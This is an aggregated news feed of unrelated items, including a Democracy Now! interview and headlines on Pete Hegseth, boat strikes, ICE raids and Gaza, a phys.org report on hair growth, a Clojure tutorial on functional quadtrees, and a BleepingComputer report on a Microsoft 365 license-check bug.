This is Democracy Now! , democracynow.org. When we come back, President Trump says he’s going to limit immigration from, quote, “the Third World.” We’ll be back to talk about this and what’s happening here in New York City, ICE raids that have been thwarted by activists blocking ICE cars. Stay with us.

[break]

AMY GOODMAN : Malian musician Khaira Arby, performing in our Democracy Now! studio.


Human hair grows through 'pulling' not pushing, study shows

Hacker News
phys.org
2025-12-04 13:22:35
Comments...
Original Article
The hair follicle organization and the multiphoton setup for live-imaging of human hair follicles. Credit: Nature Communications (2025). DOI: 10.1038/s41467-025-65143-x

Scientists have found that human hair does not grow by being pushed out of the root; it's actually pulled upward by a force associated with a hidden network of moving cells. The findings challenge decades of textbook biology and could reshape how researchers think about hair loss and regeneration.

The team, from L'Oréal Research & Innovation and Queen Mary University of London, used advanced 3D live imaging to track individual cells within living human hair follicles kept alive in culture. The study, published in Nature Communications, shows that cells in the outer root sheath—a layer encasing the hair shaft—move in a spiral downward path within the same region from where the upward pulling force originates.

Dr. Inês Sequeira, Reader in Oral and Skin Biology at Queen Mary and one of the lead authors, said, "Our results reveal a fascinating choreography inside the hair follicle. For decades, it was assumed that hair was pushed out by the dividing cells in the hair bulb. We found instead that it's actively being pulled upwards by surrounding tissue acting almost like a tiny motor."

To test this, the researchers blocked cell division inside the follicle, expecting hair growth to stop. Instead, growth continued nearly unchanged. But when they interfered with actin—a protein that enables cells to contract and move—the hair growth rate dropped by more than 80%.

Computer models confirmed that this pulling force, correlated with coordinated motion in the follicle's outer layers, was essential to match the observed speeds of hair movement.

Dr. Nicolas Tissot, the first author, from L'Oréal's Advanced Research team said, "We use a novel imaging method allowing 3D time lapse microscopy in real-time. While static images provide mere isolated snapshots, 3D time-lapse microscopy is indispensable for truly unraveling the intricate, dynamic biological processes within the hair follicle, revealing crucial cellular kinetics, migratory patterns, and rate of cell divisions that are otherwise impossible to deduce from discrete observations. This approach made it possible to model the forces generated locally."

Dr. Thomas Bornschlögl, another lead author, from the same L'Oréal team adds, "This reveals that hair growth is not driven only by cell division—instead, the outer root sheath actively pulls the hair upward. This new view of follicle mechanics opens fresh opportunities for studying hair disorders, testing drugs and advancing tissue engineering and regenerative medicine."

While the research was carried out on human follicles in lab culture, it offers new clues for hair science and regenerative medicine. The team believes that understanding these mechanical forces could help design treatments that target the follicle's physical as well as biochemical environment. Furthermore, the imaging technique developed will allow live testing of different drugs and treatments.

The study also highlights the growing role of biophysics in biology, showing how mechanical forces at the microscopic scale shape the organs we see every day.

More information: Nicolas Tissot et al, Mapping cell dynamics in human ex vivo hair follicles suggests pulling mechanism of hair growth, Nature Communications (2025). DOI: 10.1038/s41467-025-65143-x


RAM is so expensive, Samsung won't even sell it to Samsung

Hacker News
www.pcworld.com
2025-12-04 13:20:07
Comments...
Original Article


Will Hegseth Go? Defense Secretary Faces Anger from Congress over Boat Strikes, Signal Chat

Democracy Now!
www.democracynow.org
2025-12-04 13:18:50
“Pete Hegseth, much like the president he serves, sees himself as, essentially, above the law, as unconstrained by legal procedure.” Foreign policy analyst Matt Duss discusses the brewing conflict within the Trump administration over the leadership of Defense Secretary Pete Hegseth, incl...
Original Article

This is a rush transcript. Copy may not be in its final form.

NERMEEN SHAIKH : The Pentagon’s inspector general is set to release a report today on Defense Secretary Pete Hegseth’s use of the widely available messaging app Signal to discuss U.S. airstrikes in Yemen earlier this year. Two people familiar with the report’s findings told news outlets that Hegseth endangered U.S. troops by using Signal to discuss the strikes with several other senior Trump administration officials. The chat, which included Hegseth’s wife and brother, was revealed when The Atlantic’s editor Jeffrey Goldberg was accidentally added to the Signal group.

AMY GOODMAN : We’re joined now by Matt Duss, executive vice president at the Center for International Policy and former foreign policy adviser to Senator Bernie Sanders.

Matt, thanks so much for being with us. In a moment, we’re going to talk to you about the negotiations around Ukraine. But let’s start with this top news, and that is everything that’s happening right now with Pete Hegseth, the defense secretary, or, as he calls himself, the war secretary. If you can start off by talking about what’s going to be released today, but many news outlets have already reported on, saying that he shared sensitive information with a reporter and others about attacks on Yemen? Talk about the significance of this.

MATT DUSS : Right. This happened last year as strikes, U.S. strikes, on Yemen against Yemen’s Houthi government were about to begin. The Houthis, as people may remember, had been launching strikes on shipping in the Red Sea and on Israel in protest of the Gaza war. The U.S. was about to undertake strikes against the Houthis.

As you noted, the journalist Jeffrey Goldberg was included on a Signal chat of senior administration officials in which, apparently now, classified information was being shared by the secretary of defense, you know, including when the strikes would start and other things that he was not authorized to release. Now, the secretary of defense does have the authority to declassify information if he chooses, as does the president, but none of that, clearly, was done. This was just carelessness. It was reckless. And as the report is going to say, this potentially put U.S. troops and service members in danger.

AMY GOODMAN : And can you talk about the fact that Pete Hegseth refused to sit for an interview or hand over his phone? Is it just up to him, the man who is being investigated himself? And where does Roger Wicker, the head of the Senate Armed Services Committee, and Jack Reed stand on this in this investigation? What do you expect to take place?

MATT DUSS : Yeah.

AMY GOODMAN : Could they force him?

MATT DUSS : Well, I think Pete Hegseth, much like the president he serves, sees himself as, essentially, above the law, as unconstrained by legal procedures, by his own obligations, apparently, to U.S. service members, given that he very clearly put them in danger. So, unfortunately, it’s not surprising that he would not sit for an interview.

This investigation was a form of oversight, an important form of oversight, but I do think the more important form will come when we see what Congress is going to do about it. You mentioned Senator Wicker, Senator Reed in the Senate Armed Services Committee. How far do they push this? How aggressive are they going to be toward the administration when this report comes out?

And I think the question really does come down to the Republicans, because, unfortunately, in general, the Republican leadership has been pretty subservient to Trump. They have not been all that willing to assert their oversight authority. But given the recklessness of this act and also some of these other things that have been piling up around Pete Hegseth, including the strikes on the alleged drug boats that he’s facing now, from what I’m hearing, Republican impatience toward him is really, really growing on the Hill, and this could be something that really pushes people over the edge. But we’ll have to see.

AMY GOODMAN : And very quickly, Matt, today, Admiral Mitch Bradley is expected to testify before Congress about the second strike on that September 2nd boat, one of what the Trump administration calls “drug boats.” Of course, they have not presented any evidence. Nine people were killed in the first strike, two were left hanging on for dear life, and they then killed them.

MATT DUSS : Yeah.

AMY GOODMAN : The significance of what this means and the overall attacks on the boats, as President Trump says they’re going to attack Venezuela directly imminently?

MATT DUSS : Right. Unfortunately, it seems that Pete Hegseth is using Admiral Bradley as a human shield here. We’ve seen, just over the past few days, trying to put blame — or not put blame. He’s trying to say, “I stand behind Bradley, who gave the order. I didn’t give the order.” They’ve had multiple stories about what happened, what didn’t happen, who gave the order.

But it is important to understand this is happening in a context of strikes that are not — clearly not in the context of war. They are unauthorized. As you noted, there has been no proof given that these are drug boats at all, that these people were engaged in anything illegal, and even if they were, it seems absolutely unnecessary to destroy these boats, to kill these men who have been convicted of no crime.

AMY GOODMAN : And, of course, not just unnecessary, but the question is if this is just outright —

MATT DUSS : Right.

AMY GOODMAN : — murder, if these are war crimes.

MATT DUSS : That’s right. Right.

AMY GOODMAN : And finally, let me ask you about Admiral Alvin Holsey, the African American head of SOUTHCOM , the first Black head of SOUTHCOM , who’s out next week, but was forced out, apparently, in October after his objections to what’s going on with these boats being targeted. The significance of this?

MATT DUSS : Right. I mean, that happened — there was a wave of firings, essentially, early in the Trump administration, especially in DOD , a clearing out of senior leaders who were seen to be not with the program, essentially. And that seems to be what had happened here, discomfort with what was going to be a really aggressive policy toward Latin America. And that’s what we’re seeing play out.

But I do think, as you noted, while this is, you know, really, really, I would say, objectionable and clearly criminal, it does come in the context of years and decades of U.S. abuse and U.S. violations around the world. So, we need a deeper — we need to take a deeper look at the authorities that have been given and abused by successive administrations, not just this one.


Functional Quadtrees

Hacker News
lbjgruppen.com
2025-12-04 13:18:38
Comments...
Original Article

A Quadtree is a tree data structure which is useful for giving more focus/detail to certain regions of your data while saving resources elsewhere. I could only find a couple of tutorials/guides and both were imperative, so I figured it'd be fun to do a functional version in Clojure which runs in the browser.

A demo

In this blogpost I'll show you how to build both a functional Quadtree and the visualization you see below. Imagine the canvas to be a top-down view of a map and your mouse-position to be the spot you're occupying on the map. Near you, you want crisp details: small cells of high resolution. The further away we get from you/the camera (your mouse-position), the less we care about details.

Be aware that on mobile, you have to click at the spot where you want to simulate the camera's position. I recommend you view this on a desktop system with a mouse, where the simulation reacts to the mouse position in real time.

The recursive approach

It's hard to find any tutorials on how to build a general purpose Quadtree, but the 2 I did find both took the imperative approach, i.e. editing each node in place. Nothing wrong with that approach, it can be blazingly fast, but it does leave you with the housekeeping, i.e. downscaling nodes that are no longer close to the camera. I'd much prefer a declarative definition that rebuilds the entire tree in sub-milliseconds, so let's make that happen.

In this implementation, I want to show a very general functional approach, which goes like this:

  1. Read a camera (player,mouse,focus-point,whatever) position
  2. Test if the current node is optimally sized
  3. If not, split into 4 children, goto 2

Optimally sized in this case is just "Is the camera far enough away from this node?" If the distance from the camera to the node's center is smaller than some threshold, let's say the width of the node, then we split.

Our data model

Depending on your use-case, you can fit as much information as you want into this model. If you're doing some kind of 3D rendering, you might want to keep tabs on neighbor-relations, LOD steps and such, but for the basic tree structure, you just need this:

(defn qtree
  " Instantiates a tree node "
  [[x1 y1 x2 y2]]
  {:root?   false
   :bounds  [x1 y1 x2 y2]
   :center  (mapv #(js/Math.floor %)
                  [(half x2 x1)
                   (half y2 y1)])
   :width   (- x2 x1)})
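The half helper isn't shown in the post; assuming it simply returns the midpoint of two coordinates, instantiating a root node looks like this:

;; Assumed helper (not shown in the post): midpoint of two coordinates.
(defn half [b a] (/ (+ a b) 2))

(qtree [0 0 512 512])
;; => {:root? false, :bounds [0 0 512 512], :center [256 256], :width 512}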

In fact, strictly speaking, we don't need the center/width stored, but it does make life a bit easier.

Given a root node and a camera-position we can determine if we want to split or not, simply by testing the distance from the camera to the center:

(defn distance
  [[x1 y1] [x2 y2]]
  (js/Math.sqrt
   (+ (js/Math.pow (- x2 x1) 2)
      (js/Math.pow (- y2 y1) 2))))

(defn too-close?
  " Determines if the camera is within one node-width
    of the node's center "
  [ node camera ]
  (< (distance camera (:center node))
     (:width node)))

(defn split?
  [ node camera ]
  (and (too-close? node camera)
       (> (:width node) _Q_MINIMUM_SIZE)))
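At the REPL the predicates behave like this (_Q_MINIMUM_SIZE isn't defined in this excerpt; assume something small like 8):

(def node (qtree [0 0 512 512]))

(too-close? node [300 300])  ;; distance to [256 256] is ~62, less than 512 => true
(split? node [300 300])      ;; => true, since the width 512 > _Q_MINIMUM_SIZE
(too-close? node [2000 300]) ;; distance ~1745 => false, the node stays whole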

That final check on the width of the node essentially allows us to recurse until we can't split anymore. In Clojure we have 2 very powerful idioms for walking a tree structure: Postwalk and Prewalk.

Postwalk is a depth-first, post-order walk of the tree which applies some arbitrary function to each element.

(w/postwalk (fn [e]
                (prn "Looking at: " e)
                e)
            {:rootval 1
            :node1 {:data "foo"
            :vec  [1 2 3]}})
"Looking at: " :rootval
"Looking at: " 1
"Looking at: " [:rootval 1]
"Looking at: " :node1
"Looking at: " :data
"Looking at: " "foo"
"Looking at: " [:data "foo"]
"Looking at: " :vec
"Looking at: " 1
"Looking at: " 2
"Looking at: " 3
"Looking at: " [1 2 3]
"Looking at: " [:vec [1 2 3]]
"Looking at: " {:data "foo", :vec [1 2 3]}
"Looking at: " [:node1 {:data "foo", :vec [1 2 3]}]
"Looking at: " {:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}
{:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}

I hope this is an intuitive way to see the path postwalk takes. The function only prints what it sees and then returns it as is, thus the end result is exactly the map we started out with. Notice how we first see the root key, then its value, then both together as a MapEntry, then it goes deeper into the tree.

Now compare that with prewalk:

(w/prewalk (fn [e]
               (prn "Looking at: " e)
               e)
           {:rootval 1
           :node1 {:data "foo"
           :vec  [1 2 3]}})
"Looking at: " {:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}
"Looking at: " [:rootval 1]
"Looking at: " :rootval
"Looking at: " 1
"Looking at: " [:node1 {:data "foo", :vec [1 2 3]}]
"Looking at: " :node1
"Looking at: " {:data "foo", :vec [1 2 3]}
"Looking at: " [:data "foo"]
"Looking at: " :data
"Looking at: " "foo"
"Looking at: " [:vec [1 2 3]]
"Looking at: " :vec
"Looking at: " [1 2 3]
"Looking at: " 1
"Looking at: " 2
"Looking at: " 3
{:rootval 1, :node1 {:data "foo", :vec [1 2 3]}}

Prewalk examines the same elements, but the path is what we call a pre-order traversal: you see a node before its contents, and by implication, you can swap out a node and the walk will then visit the elements of the replacement. All in all, prewalk makes for a very simple recursive pattern:

(w/prewalk
 (fn [n]
   (if (and (map? n) (split? n [x y]))  ; x,y is the camera position
     (subdivide n)
     n))
 qtree)                                 ; qtree here is the root node, not the constructor

Yes, it's really that simple. Given a root-node and a camera-position (x,y), this will recursively resolve all children to the maximum resolution.
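
The subdivide function isn't shown in the snippets above; the repo has the real thing, but a minimal sketch, assuming the :bounds/:center layout from our data model, could look like this:

(defn subdivide
  " Splits a node into 4 equally sized children.
    A sketch; the repo's version may differ. "
  [{[x1 y1 x2 y2] :bounds [cx cy] :center :as node}]
  (assoc node :children
         [(qtree [x1 y1 cx cy])      ; top-left
          (qtree [cx y1 x2 cy])      ; top-right
          (qtree [x1 cy cx y2])      ; bottom-left
          (qtree [cx cy x2 y2])]))   ; bottom-right

Because prewalk descends into whatever the function returns, each freshly created child is immediately tested with split? as well, which is exactly what drives the recursion down to _Q_MINIMUM_SIZE.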

The Visualization

If you want to read ahead, I've shared a repo here: Github

The code should run straight out of the box and serve a web interface on port 8020. Shadow-cljs makes light work of compiling anything from a single file to a huge frontend application into a single JS file.
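
For reference, the shadow-cljs configuration for a build like this can be tiny. The snippet below is an illustrative sketch rather than the repo's actual file, and the quadtree.core/init entry point is a made-up name:

;; shadow-cljs.edn (illustrative)
{:source-paths ["src"]
 :dev-http     {8020 "public"}   ; serves the web interface on port 8020
 :builds       {:app {:target     :browser
                      :output-dir "public/js"
                      :asset-path "/js"
                      :modules    {:main {:init-fn quadtree.core/init}}}}}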

Running in a browser, we get a nice 2D API from the standard canvas element. Basically, to draw our Quadtree we need only 3 things:

  • A Quadtree
  • A function which draws a node
  • A function which draws all children

As you've probably guessed, the Quadtree itself is just a simple map with some keys. But because this is a realtime visualization, I want to create a connection between whichever tree I generate and what's drawn on screen. Fortunately, both Clojure and ClojureScript support atoms and watches:

(def quadInst (atom nil))

(add-watch quadInst :updateQuads
           (fn [_ _ old-tree new-tree]
             (draw-all new-tree)))

By convention in Clojure, we name an argument underscore (_) if we do not care about it. In this case, I only need the new-tree for the visualization. If you're not a native Clojurian you might find this pattern appealing, as it gives you access to both the pre-update and post-update trees, meaning you can run diffs, adding new children to a scene while removing others.

I mention it here for demonstration purposes only; in the latest commit you'll see I actually remove all atoms and demonstrate a 100% pure functional solution. However, for the purpose of explaining Quadtrees, this is a simple subscription pattern which most developers will recognize. It ensures that whenever the tree atom is updated, so is the screen.
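
To close the loop, here is roughly what wiring the rebuild to the mouse could look like. This is a sketch: root-node is assumed to be a stored copy of the unsplit root, and subdivide is the split function from earlier:

(defn on-mouse-move
  " Rebuilds the whole tree on every mouse move;
    the watch above then redraws the screen "
  [event]
  (let [camera [(.-clientX event) (.-clientY event)]]
    (reset! quadInst
            (w/prewalk (fn [n]
                         (if (and (map? n) (split? n camera))
                           (subdivide n)
                           n))
                       root-node))))

The draw-all the watch invokes simply recurses through the children: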

(defn draw-all
  [ tree ]
  (draw (:root? tree)
        tree
        (get-tree-color tree))
  (when-let [children (:children tree)]
    (doseq [c children]
      (draw-all c))))
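
The node-level draw function lives in the repo; a minimal canvas version, assuming a <canvas id="canvas"> element on the page, might look something like this:

(defn draw
  " Strokes a node's bounds on the canvas.
    A sketch; the repo's version does more with the root flag. "
  [root? {[x1 y1 x2 y2] :bounds} color]
  (let [ctx (-> (.getElementById js/document "canvas")
                (.getContext "2d"))]
    (when root?
      ;; starting a new frame, so clear the previous one
      (.clearRect ctx 0 0
                  (.. ctx -canvas -width)
                  (.. ctx -canvas -height)))
    (set! (.-strokeStyle ctx) color)
    (.strokeRect ctx x1 y1 (- x2 x1) (- y2 y1))))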

However, there's a fun detail here. To keep the picture visually consistent I couldn't just use random colors; that would make the entire screen flicker whenever you moved the mouse. Basically, if I have a rectangle centered at 50,50, I always want it to have the same color. A really neat and simple trick is the 32-bit string hash, which is succinctly implemented in JavaScript like so:

function fastHash(str) {
    let hash = 0;
    for (let i = 0; i < str.length; i++) {
        hash = (hash << 5) - hash + str.charCodeAt(i); // Hash computation
        hash |= 0; // Convert to 32bit integer
    }
    return hash >>> 0; // Ensure the result is unsigned
}

Basically my idea is to hash the stringified center, i.e. "[50 50]", and convert that to a hex color. In ClojureScript, you could do it like so:

(defn hash-str
  " Standard 32-bit string hash: h = (h << 5) - h + charCode "
  [ s ]
  (reduce #(-> (bit-shift-left %1 5)
               (- %1)
               (+ (.charCodeAt %2 0))
               (bit-or 0))
          0 s))

(defn get-tree-color
  [ {c :center} ]
  (let [hash (bit-and (hash-str (str c)) 0xffffff)
        hex  (.toString hash 16)]
    (str "#" (apply str (repeat (- 6 (count hex)) "0")) hex)))

That's basically all you need.

Conclusion

Quadtrees are great when you have more work to do than resources available. Imagine using a VR headset. Whichever point you're focused on needs to be crisp in detail; you want the highest resolution possible on your hardware. Everything outside of your focus area should be dialed down in resolution, because your eyes won't be able to pick it up anyway, and that compute power can be used elsewhere. There are many other applications.

ClojureScript is great because it allows us to express ourselves succinctly and functionally. The core of this implementation is only about 25 lines long. That's much easier to reason about and debug than some other implementations I've seen, which span several hundred lines.

Shadow-cljs is great for more reasons than I can cover in this post, but I will highlight the ability to quickly ship a highly optimized bit of JS using only about 10 lines of configuration. And they even throw in a free web server for easy testing and REPL-driven development; what's not to like?

Full source code: Github

Microsoft 365 license check bug blocks desktop app downloads

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 13:18:08
Microsoft is investigating and working to resolve a known issue that prevents customers from downloading Microsoft 365 desktop apps from the Microsoft 365 homepage. [...]...
Original Article

Microsoft 365

Microsoft is investigating and working to resolve a known issue that prevents customers from downloading Microsoft 365 desktop apps from the Microsoft 365 homepage.

As detailed in a Wednesday incident report (OP1192004) seen by BleepingComputer, this bug has been impacting users since November 2nd, causing Office Client issues for affected customers.

Microsoft has already developed and is now testing a fix to address the issue and added that it will provide an update on progress by 6:30 PM UTC later today.

While it noted that the bug may affect any user who attempts to download Microsoft 365 desktop apps, it has not yet provided more details on the extent of the problem.

However, when it acknowledged the issue this morning, Microsoft tagged it as an incident, a designation used for critical service issues that usually involve noticeable user impact.

"Our analysis of the components of Microsoft 365 infrastructure, as well as recently deployed changes, identified that a recent service update containing a code issue is impacting the license check process, leading to users being unable to download Microsoft 365 desktop apps from the homepage," Microsoft said.

"We're continuing to validate and test the aforementioned fix in our internal environment to ensure its efficacy prior to deploying it to the affected infrastructure and we expect to provide an estimated deployment time line by our next scheduled update."

Microsoft is also working to resolve a known issue that blocks some users from opening Excel email attachments in the new Outlook client due to an encoding error in Excel file names.

One year ago, Microsoft addressed another known issue triggered by licensing changes that caused random "Product Deactivated" errors for customers using Microsoft 365 Office apps, while last month, it resolved a bug caused by misconfigured authentication components that prevented customers from installing the Microsoft 365 desktop apps on Windows devices.

Headlines for December 4, 2025

Democracy Now!
www.democracynow.org
2025-12-04 13:00:00
Senate War Powers Resolution Seeks to Block Trump from Unilaterally Attacking Venezuela, Admiral to Brief Lawmakers About U.S. Boat Strikes Condemned by Human Rights Groups as “Murder”, New York Times Sues Pentagon over Press Policy That “Violates the First Amendment”, Israel...
Original Article

Senate War Powers Resolution Seeks to Block Trump from Unilaterally Attacking Venezuela

Dec 04, 2025

A bipartisan group of senators has introduced a war powers resolution seeking to block the White House from launching an attack on Venezuela without congressional authorization, after President Trump said a land attack would start “very soon.” The resolution was co-sponsored by Democrats Chuck Schumer, Tim Kaine and Adam Schiff, along with Kentucky Republican Senator Rand Paul, who wrote, “The American people do not want to be dragged into endless war with Venezuela without public debate or a vote. We ought to defend what the Constitution demands: deliberation before war.”

In Venezuela, President Nicolás Maduro on Wednesday confirmed he spoke by phone with President Trump about 10 days ago, calling the conversation a potential opening for diplomacy.

President Nicolás Maduro : “I received a phone call and spoke with President Donald Trump. I can say that the conversation was in a respectful tone, and I can even say it was cordial between the U.S. president and the president of Venezuela. I add that if this call means there are steps toward a respectful dialogue between states, between countries, then welcome dialogue, welcome diplomacy, because we will always seek peace.”

Admiral to Brief Lawmakers About U.S. Boat Strikes Condemned by Human Rights Groups as “Murder”

Dec 04, 2025

The U.S. Navy commander overseeing the Pentagon’s attacks on alleged drug boats is set to testify on Capitol Hill today. Admiral Frank M. “Mitch” Bradley will provide a classified briefing to select congressmembers about the U.S. attacks in the Caribbean and eastern Pacific. Human rights groups, including Amnesty International, have condemned the strikes as “murder.”

New York Times Sues Pentagon over Press Policy That “Violates the First Amendment”

Dec 04, 2025

The Pentagon’s inspector general is set to release a report today on Defense Secretary Pete Hegseth’s use of the widely available messaging app Signal to discuss U.S. airstrikes in Yemen earlier this year. Two people familiar with the report’s findings told news outlets that Hegseth endangered U.S. troops by using Signal to discuss the strikes with several other senior Trump administration officials. The chat, which included Hegseth’s wife and brother, was revealed when The Atlantic’s editor Jeffrey Goldberg was accidentally added to the Signal group. Defense Secretary Hegseth refused to cooperate with the inspector general, declining to hand over his phone or sit for an interview.

This comes as The New York Times is suing the Pentagon over its new press policy that requires media outlets to pledge not to gather information unless defense officials formally authorize its release. Earlier this year, reporters at the Times, along with several other media outlets, gave up their press passes rather than comply with the Pentagon’s new policy. The Times argues in its lawsuit that the Pentagon’s policy “is exactly the type of speech- and press-restrictive scheme that the Supreme Court and D.C. Circuit have recognized violates the First Amendment.”

Israeli Forces in Gaza Kill Seven Palestinians in Latest Violation of October Ceasefire

Dec 04, 2025

Israeli forces have killed seven more Palestinians in the Gaza Strip in Israel’s latest violation of the ceasefire that was declared nearly two months ago. Among the dead are five members of a single family — a middle-aged mother, father, their eldest son and their two young children — killed when Israel bombed their tent in Khan Younis. The attack targeted the al-Mawasi evacuation zone, which Israel previously declared a “safe” area for displaced people. It followed funerals for Palestinians killed in strikes a day earlier. This is Saber al-Sakani, whose family members were killed and wounded in an Israeli attack on Gaza City Tuesday.

Saber al-Sakani : “I lost my brother and my two nephews. My brother’s wife and her daughter are hospitalized in intensive care. We’re asking you to stop the wars, for God’s sake.”

Health officials in Gaza report 366 Palestinians have been killed and 938 injured by Israeli forces since the October 10 ceasefire.

Meanwhile, in southern Gaza, hundreds of Palestinians attended a mass wedding for 54 couples in the city of Khan Younis on Tuesday. Organizers called it an act of defiance against Israel’s campaign of genocide against Palestinians.

Maher Mezher : “It is a message for the killers and criminals, whether Ben-Gvir or Smotrich or Netanyahu, that our Palestinian people embrace life, cling to life and love life, and that they will continue in their struggle and strife through this mass wedding and all forms of life. We will continue from the middle of the rubble, destruction and death in the city, the city of Hamad, to send a new message that we will rebuild this destroyed city.”

“An Academic Veneer for Genocide”: Protesters Heckle Former Israeli Politicians at Toronto Debate

Dec 04, 2025

In Toronto, protesters interrupted speakers at a prominent debate series Wednesday evening, after organizers invited four former senior Israeli politicians to a discussion about the two-state solution for Israel and Palestine, without inviting a single Palestinian to the stage. The Munk Debates event featured former Israeli Prime Minister Ehud Olmert, former Foreign Minister Tzipi Livni, former Israeli Ambassador to the U.S. Michael Oren and former Interior Minister Ayelet Shaked.

Protester 1 : “You’re a war criminal!”

Tzipi Livni : “That the Zionist dream is in danger.”

Protester 1 : “You’re all war criminals!”

Protester 2 : [inaudible] “You shouldn’t even be in Canada!”

Protester 1 : “Shut up and leave!”

Protester 2 : “Easy for you to say.”

Protester 1 : “Get the [bleep] out of here! You’re war criminals!”

In a statement, protest organizers wrote, “By putting these individuals on stage — unchallenged by any Palestinian voices — the Munk Debates is creating a sanitized, academic veneer for genocide. The event manufactures consent for ongoing occupation; launders the reputations of officials implicated in war crimes; and rewrites reality by excluding Palestinians entirely.”

Immigration Agents Deploy to New Orleans and Twin Cities, Seeking to Arrest Thousands

Dec 04, 2025

The Trump administration deployed federal Border Patrol agents across immigrant communities in the New Orleans area Wednesday, calling it “Operation Catahoula Crunch.” Gregory Bovino, a senior Border Patrol official who has been the face of President Trump’s mass deportation campaign, was seen patrolling the city’s French Quarter. A New Orleans resident told the Associated Press he watched agents arresting men outside a home improvement store. The Trump administration says it’s seeking to arrest 5,000 people during the surge. It comes as Immigration and Customs agents have begun a mass arrest campaign in Minnesota targeting Somali American communities in the Minneapolis-St. Paul region. The raids follow a Cabinet meeting on Tuesday in which Trump called Somalis “garbage.” Trump then doubled down on his racist rhetoric Wednesday.

ACLU Says ICE Violates Policy Against Jailing Pregnant People and Nursing Moms

Dec 04, 2025

Immigration advocates and lawyers contend that despite ICE’s policy that agents shouldn’t detain, arrest or hold pregnant, postpartum and nursing mothers, pregnant people are increasingly rounded up, deported and detained. The ACLU has documented more than a dozen cases of pregnant women housed without proper medical care at the Stewart Detention Center in Lumpkin, Georgia, and the ICE processing center in Basile, Louisiana. In one case, a woman was shackled while she miscarried. Another woman with a high-risk pregnancy was placed in solitary confinement.

Meanwhile, here in New York City, the news outlet The City is reporting ICE agents arrested a Chinese father named Fei and his 6-year-old son Yuanxin during an immigration check-in in Manhattan last week. The father was separated from his son and taken to an ICE jail in upstate New York. Advocates say “nobody knows” where Yuanxin is being held. According to the Deportation Data Project, the boy is part of a growing number of children arrested and detained by ICE. This year ICE arrested 151 children.

Prisoners Face “Harrowing Human Rights Violations” at Infamous ICE Jail in Florida Everglades

Dec 04, 2025

A new report by Amnesty International says that immigrants held at the ICE jail in Florida known as “Alligator Alcatraz” were shackled inside a two-foot-high metal cage and left outside without water for up to a day at a time. The report also details “unsanitary conditions, including overflowing toilets with fecal matter seeping into where people are sleeping, limited access to showers, exposure to insects without protective measures, lights on 24 hours a day, poor quality food and water, and lack of privacy.”

Democrats Release Images of Epstein’s Caribbean Island as Ghislaine Maxwell Petitions for Release

Dec 04, 2025

Democrats on the House Oversight Committee released more than 150 new photos and videos of the late convicted sex offender Jeffrey Epstein’s private island in the Caribbean. The images show a room with a dentist’s chair surrounded by masks, a bedroom, a palm tree-lined swimming pool, and several other living spaces. Democratic Congressmember Robert Garcia, the ranking member on the House Oversight Committee, said, “These new images are a disturbing look into the world of Jeffrey Epstein and his island. We are releasing these photos and videos to ensure public transparency in our investigation and to help piece together the full picture of Epstein’s horrific crimes. We won’t stop fighting until we deliver justice for the survivors.”

Meanwhile, Epstein’s co-conspirator Ghislaine Maxwell, who is currently serving a 20-year sentence for sex trafficking, is planning to ask a court to release her — that’s according to a letter filed at a federal court in Manhattan. Earlier this year, Maxwell was transferred from a federal prison in Florida to a minimum-security camp in Texas about a week after she spoke with Deputy Attorney General Todd Blanche, who is one of President Trump’s former lawyers.

ADP Reports U.S. Economy Lost 32,000 Jobs Last Month

Dec 04, 2025

In labor news, new reporting from the payroll processing firm ADP shows the U.S. economy lost 32,000 jobs last month, led by a drop in small business employment. Most industries laid off workers, with net gains seen only in the hospitality and healthcare sectors. A year ago, the U.S. economy was adding about 200,000 jobs per month; now, it’s had its first three-month decline since the 2020 recession.

Trump Admin to Slash Fuel Efficiency Standards Enacted Under the Biden Admin

Dec 04, 2025

The Trump administration is seeking to slash fuel efficiency standards enacted under the Biden administration. Under current rules, U.S. automakers are required to boost the fuel efficiency of passenger cars and light trucks to about 50 miles per gallon by 2031. The revised standards proposed by the National Highway Traffic Safety Administration would cut that to just 34 miles per gallon. In a statement, the Center for Biological Diversity wrote, “In one stroke, Trump is worsening three of our nation’s most vexing problems: the thirst for oil, high gas pump costs, and global warming.”

Trump to Issue Pardons for Democratic Congressmember Cuellar and His Wife

Dec 04, 2025

President Trump said Wednesday he will issue “full and unconditional” pardons for Democratic Congressmember Henry Cuellar and his wife Imelda, both of whom faced a dozen charges of bribery, money laundering and conspiracy. According to the indictment, the Cuellars accepted roughly $600,000 worth of bribes from a Mexican bank and an oil and gas company owned by the government of Azerbaijan. On X, the Sunrise Movement said, “This is disgusting. Henry Cuellar, the last anti-choice Democrat in the House, sold out his own community for bribes from a foreign government and oil corporation. Then he cozied up to Trump for a pardon while the Democratic establishment stood by and watched.” President Trump justified the pardon by praising Congressmember Cuellar’s stance on immigration.

President Donald Trump : “He’s a respected person. He was treated very badly because he said that people should not be allowed to pour into our country. And he was right. He didn’t like open borders.”

Paramount Skydance Corporation Doubles Proposed Breakup Fee to Acquire Warner Bros.

Dec 04, 2025

In media news, the Paramount Skydance Corporation has more than doubled the proposed breakup fee in its offer to acquire Warner Bros. Discovery, as it seeks to outbid rivals looking to acquire the media conglomerate. The proposed merger comes just months after Skydance completed its acquisition of Paramount, the parent company of CBS , and after Paramount agreed to pay $16 million to settle a lawsuit brought by President Trump, who objected to how “60 Minutes” edited an interview with Kamala Harris. Paramount board chair and controlling shareholder Shari Redstone reportedly sought the settlement to ensure the FCC approved Paramount’s merger. On Wednesday, Redstone defended the settlement during the Reuters NEXT summit in New York City.

Shari Redstone : “I do believe it was the right decision. I think the trial had been set for two years out. The chaos that would have been created over the next two years, I’m not sure the company could have survived, the internal distractions, the external distractions, in spite of everything that we were doing in the company. And during those months we became the number four streaming service. Nobody was talking about that. All people were talking about was the, you know, distraction of the Trump litigation.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Imo.im – Instant Messenger

Hacker News
imo.im
2025-12-04 12:25:47
Comments...
Original Article

imo: Free Video Calls and Messages - Official Website

Japanese Four-Cylinder Engine Is So Reliable Still in Production After 25 Years

Hacker News
www.topspeed.com
2025-12-04 12:09:43
Comments...

The AI boom is heralding a new gold rush in the American west

Guardian
www.theguardian.com
2025-12-04 12:00:19
